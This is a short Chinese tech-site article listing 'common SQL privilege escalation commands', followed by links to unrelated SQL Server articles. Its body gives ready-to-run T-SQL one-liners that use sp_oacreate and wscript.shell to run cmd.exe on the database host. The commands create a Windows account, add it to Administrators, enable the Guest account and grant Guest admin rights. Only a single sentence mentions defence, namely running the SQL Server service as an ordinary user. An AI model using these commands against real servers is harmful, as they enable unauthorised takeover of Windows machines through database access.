SQL 提权常用命令

更新时间：2009年07月24日 00:29:34 作者：

SQL 提权常用命令，大家可以考虑下将sqlserver的服务运行权限设置为普通用户，即可防止下面的提权。

1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法，可以参考脚本之家服务器安全设置栏目。

SQL
提权

SQL Server两表数据同步的多种方法详解
这篇文章主要介绍了SQL Server两表数据同步的多种方法，本文通过实例代码给大家介绍的非常详细，对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
2023-06-06
浅谈SELECT *会导致查询效率低的原因
本文主要介绍了浅谈SELECT *会导致查询效率低的原因，文中通过示例代码介绍的非常详细，对大家的学习或者工作具有一定的参考学习价值，需要的朋友们下面随着小编来一起学习学习吧
2023-07-07
SQL Server 通过with as方法查询树型结构
with as 公用表表达式类似VIEW，但是不并没有创建对象，WITH AS 公用表表达式不创建对象，只能被后随的SELECT语句
2019-11-11
CentOS 7.3上SQL Server vNext CTP 1.2安装教程
这篇文章主要为大家详细介绍了CentOS 7.3上SQL Server vNext CTP 1.2安装教程，具有一定的参考价值，感兴趣的小伙伴们可以参考一下
2017-01-01
SQL的SUBSTR()函数使用介绍
SUBSTR函数是用来截取数据库某一列字段中的一部分，在各个数据库的函数名称不一样，下面为大家介绍其具体的使用
2013-11-11
SQL语句实现删除ACCESS重复记录的两种方法
有两个意义上的重复记录，一是完全重复的记录，也即所有字段均重复的记录，二是部分关键字段重复的记录，比如Name字段重复，而其他字段不一定重复或都重复可以忽略。
2010-04-04
GreatSQL 在SQL中如何使用 HINT 语法修改会话变量
GreatSQL推出新的优化Hint功能,名为SET_VAR,允许用户在查询语句中修改数据库的会话变量,但只对当前查询会话生效,不影响其他会话,本文给大家介绍GreatSQL 在SQL中如何使用 HINT 语法修改会话变量,感兴趣的朋友一起看看吧
2024-10-10
SqlServer数据库远程连接案例教程
这篇文章主要介绍了SqlServer数据库远程连接案例教程,本篇文章通过简要的案例,讲解了该项技术的了解与使用,以下就是详细内容,需要的朋友可以参考下
2021-07-07
在SQL Server中实现最短路径搜索的解决方法
本篇文章小编为大家介绍，在SQL Server中实现最短路径搜索的解决方法。需要的朋友参考下
2013-04-04
SQL Server评估期已过问题的解决方法
这篇文章主要为大家详细介绍了SQL Server评估期已过问题的解决方法，感兴趣的小伙伴们可以参考一下
2016-03-03